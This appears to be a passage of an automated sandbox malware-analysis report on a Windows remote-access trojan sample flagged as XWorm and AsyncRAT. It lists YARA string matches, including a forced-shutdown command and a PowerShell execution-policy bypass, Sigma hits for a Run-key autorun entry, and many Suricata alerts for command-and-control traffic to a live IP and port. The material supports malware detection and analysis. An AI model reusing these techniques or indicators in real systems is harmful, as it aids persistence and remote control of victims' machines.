2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8934:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ae6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84c6:$cnc4: POST / HTTP/1.1
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x6e76:$str01: $VB$Local_Port 0x6e67:$str02: $VB$Local_Host 0x70d3:$str03: get_Jpeg 0x6b52:$str04: get_ServicePack 0x7f54:$str05: Select * from AntivirusProduct 0x8152:$str06: PCRestart 0x8166:$str07: shutdown.exe /f /r /t 0 0x8218:$str08: StopReport 0x81ee:$str09: StopDDos 0x82e4:$str10: sendPlugin 0x8482:$str12: -ExecutionPolicy Bypass -File " 0x85ab:$str13: Content-length: 5235
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8934:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ae6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84c6:$cnc4: POST / HTTP/1.1
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
3.2.RegAsm.exe.7c30000.2.raw.unpack	JoeSecurity_SugarDump	Yara detected SugarDump	Joe Security
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
Click to see the 39 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 38.68.49.150, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 5384, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49684

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, ProcessId: 6296, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AutoStartApp

Suricata Signatures

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:05.104185+0100	2853685	1	A Network Trojan was detected	192.168.2.8	49683	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:20.413893+0100	2852870	1	Malware Command and Control Activity Detected	38.68.49.150	7777	192.168.2.8	49684	TCP
2025-03-16T01:40:20.703994+0100	2852870	1	Malware Command and Control Activity Detected	38.68.49.150	7777	192.168.2.8	49684	TCP
2025-03-16T01:40:27.135291+0100	2852870	1	Malware Command and Control Activity Detected	38.68.49.150	7777	192.168.2.8	49684	TCP
2025-03-16T01:40:35.032717+0100	2852870	1	Malware Command and Control Activity Detected	38.68.49.150	7777	192.168.2.8	49684	TCP
2025-03-16T01:40:49.628427+0100	2852870	1	Malware Command and Control Activity Detected	38.68.49.150	7777	192.168.2.8	49684	TCP
2025-03-16T01:40:54.705957+0100	2852870	1	Malware Command and Control Activity Detected	38.68.49.150	7777	192.168.2.8	49684	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:13.947183+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.056980+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.166187+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.275279+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.384661+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.507077+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.618978+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.754079+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.869292+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.197563+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.306616+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.415958+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.525200+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.634719+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.744341+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.853578+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.962753+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.098477+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.186847+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.306603+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.415975+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.556674+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.665935+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.775451+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.889673+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.009783+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.119262+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.228683+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.350441+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.447155+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.557756+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.667192+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.794284+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.922896+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.041189+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.154450+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.277537+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.486605+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.713563+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.822458+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.931704+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.040975+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.172001+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.307002+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.431846+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.541025+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.650312+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.759694+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.869357+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.978527+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.087713+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.197259+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.326486+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.415951+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49684	38.68.49.150	7777	TCP
2025-03-16T01:40:20.415956+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.778281+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.895722+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.052790+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.248492+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.373981+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.479547+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.587813+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.697317+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.806528+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.915924+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.030093+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.134684+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.244798+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.353571+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.462834+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.572293+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.681616+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.790859+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.918538+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.009724+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.119067+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.228617+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.337842+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.469574+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.572243+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.743001+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.145794+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.259997+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.369126+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.478853+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.587798+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.697405+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.806668+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.915858+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.025376+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.134660+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.244011+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.390554+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.462856+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.572070+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.681566+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.806461+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.900324+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.009663+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.119148+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.228503+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.370607+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.448007+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.556618+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.665987+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.775521+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.886679+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.994035+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.103577+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.243267+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.353434+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.462806+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.572098+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.681578+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.791245+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.900392+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.009660+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.119586+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.229456+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.349979+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.462826+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.575181+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.681662+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.790865+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.900236+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.009649+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.118971+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.228759+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.397783+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.447567+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.556828+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.665938+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.780769+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.884759+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.994287+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.108683+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.212769+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.328599+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.467644+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.572417+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.704564+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.954507+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.056486+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.165869+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.275165+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.384678+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.493949+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.612951+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.712721+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.822224+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.931542+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.040909+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.155443+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.259807+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.373210+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.478398+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.588030+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.697402+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.806566+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.916251+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.025229+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.140365+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.291018+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.519976+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.786057+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.900290+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.009560+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
